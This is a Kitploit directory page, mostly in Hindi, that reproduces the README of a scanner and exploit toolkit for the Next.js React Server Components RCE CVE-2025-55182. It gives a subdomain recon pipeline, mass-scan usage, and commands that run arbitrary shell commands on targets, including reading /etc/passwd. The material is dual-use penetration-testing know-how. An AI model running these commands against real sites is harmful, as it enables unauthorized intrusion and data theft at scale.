Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-Simple-Scanner — उच्च-निष्ठा RCE स्कैनर CVE-2025-55182 को प्रभावित करने वाले Next.js RSC के लिए। बड़े पैमाने पर स्कैनिंग, कमांड निष्पादन और स्वचालित recon पाइपलाइनों का समर्थन करता है। पेंटेस्टर्स, शोधकर्ताओं और बाउंटी हंटर्स के लिए बनाया गया। | Kitploit
उपकरण/GitHubGitHub/satriarizka/cve-2025-55182-simple-scanner
टोहीभेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
satriarizka/cve-2025-55182-simple-scanner

CVE-2025-55182-Simple-Scanner

उच्च-निष्ठा RCE स्कैनर CVE-2025-55182 को प्रभावित करने वाले Next.js RSC के लिए। बड़े पैमाने पर स्कैनिंग, कमांड निष्पादन और स्वचालित recon पाइपलाइनों का समर्थन करता है। पेंटेस्टर्स, शोधकर्ताओं और बाउंटी हंटर्स के लिए बनाया गया।

रिपॉजिटरी देखें
49 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-55182: React Server Components RCE Scanner

CVE-2025-55182 का पता लगाने और शोषण करने के लिए एक व्यापक टूलकिट, जो React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में एक क्रिटिकल रिमोट कोड एक्ज़ीक्यूशन भेद्यता है।

इस रिपॉजिटरी में एक एकीकृत Bash स्कैनर (सिंगल और मास मोड), Python/Go कार्यान्वयन, और एक बग बाउंटी रिकॉनिसेंस वर्कफ़्लो शामिल है।

Scanner Menu Scanner Demo


📂 रिपॉजिटरी संरचना

  • scanner.sh — सिंगल टार्गेट और मास स्कैनिंग के लिए ऑल-इन-वन Bash स्क्रिप्ट
  • python/exploit.py — स्थिर Python कार्यान्वयन (बेहतर JSON एस्केपिंग)
  • go/main.go — उच्च-प्रदर्शन कार्यान्वयन (संकलित करने योग्य)

🚀 रिकॉनिसेंस वर्कफ़्लो (बग बाउंटी पद्धति)

वाइल्डकार्ड डोमेन पर बड़े पैमाने पर हंटिंग के लिए, स्कैनिंग से पहले लक्ष्यों को फ़िल्टर करने के लिए इस पाइपलाइन का उपयोग करें:

root@kitploit:~
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. Filter for live hosts
httpx -l subs.txt -o live.txt

# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ Bash स्कैनर का उपयोग (अनुशंसित)

scanner.sh स्क्रिप्ट सिंगल टार्गेट स्कैन और फ़ाइल सूची से मास स्कैनिंग का समर्थन करती है।

🔧 इंस्टॉलेशन

root@kitploit:~
chmod +x scanner.sh

1️⃣ सिंगल टार्गेट मोड

वर्बोज़ आउटपुट के साथ किसी विशिष्ट लक्ष्य को सत्यापित करने के लिए सर्वोत्तम।

root@kitploit:~
# Basic check (defaults to "id")
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ मास स्कैन मोड

URLs की सूची को कुशलतापूर्वक स्कैन करता है और कमजोर होस्ट को एक फ़ाइल में सहेजता है।

root@kitploit:~
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"

# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt

विकल्प


🐍 Python संस्करण

यदि आपको Bash में विशेष वर्णों को एस्केप करने में समस्या होती है तो इसका उपयोग करें।

आवश्यकताएँ

root@kitploit:~
pip install requests

उपयोग

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 Go संस्करण

उच्च प्रदर्शन, न्यूनतम निर्भरताएँ।

सीधे चलाएँ

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

बाइनरी बनाएँ

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। अनधिकृत उपयोग सख्ती से अवैध है। डेवलपर इस प्रोग्राम के दुरुपयोग या इससे होने वाली क्षति के लिए कोई देयता नहीं मानता है।


🔗 संदर्भ

  • NVD CVE विवरण: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • React सुरक्षा सलाह (React Server Components भेद्यता): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • ProjectDiscovery Nuclei टेम्पलेट: https://cloud.projectdiscovery.io/library/CVE-2025-55182

टूल डाउनलोड करें
FlagDescription
-d, --domainसिंगल टार्गेट URL
-l, --listURLs की सूची वाली फ़ाइल
-c, --commandनिष्पादित करने का कमांड (डिफ़ॉल्ट: id)
-o, --outputकमजोर होस्ट के लिए आउटपुट फ़ाइल (डिफ़ॉल्ट: vulnerable_hosts.txt)